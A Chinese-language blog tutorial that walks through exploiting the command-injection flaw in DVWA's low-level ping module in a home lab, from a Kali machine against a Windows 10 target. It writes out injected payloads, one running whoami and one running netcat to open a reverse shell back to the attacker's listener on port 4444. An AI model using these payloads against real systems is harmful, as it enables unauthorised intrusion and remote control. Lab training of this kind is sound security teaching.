黑客零基础第三章-Web漏洞利用第四节-命令注入

本节讲述了DVWA的命令注入漏洞,并通过对这个漏洞的利用,获取靶机的shell,完成入侵。

1.场景


虚拟机:vmware

攻击主机:kali

IP:192.168.239.142

靶机:Windows10

IP:192.168.239.1

服务:xampp启动的DVWA


2.DVWA 命令注入漏洞简介

DVWA中命令注入模块是一个ping命令的执行,

查看源码(此处为了理解漏洞,只学习low级别源码)

对输入没有进行任何过滤。

 3.漏洞利用

尝试读取low.php,在输入框框输入

192.168.239.1&&whoami

whoami命令执行。

靶机windows10上装过nc,所以可以通过靶机的nc,获取靶机的shell。

现在kali上开启nc监听4444端口,然后在DVWA上输入以下payload点击submit提交。

192.168.239.1&& nc64.exe -e cmd.exe 192.168.239.142 4444

完成,kali获取了windows10的shell!

 

 

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值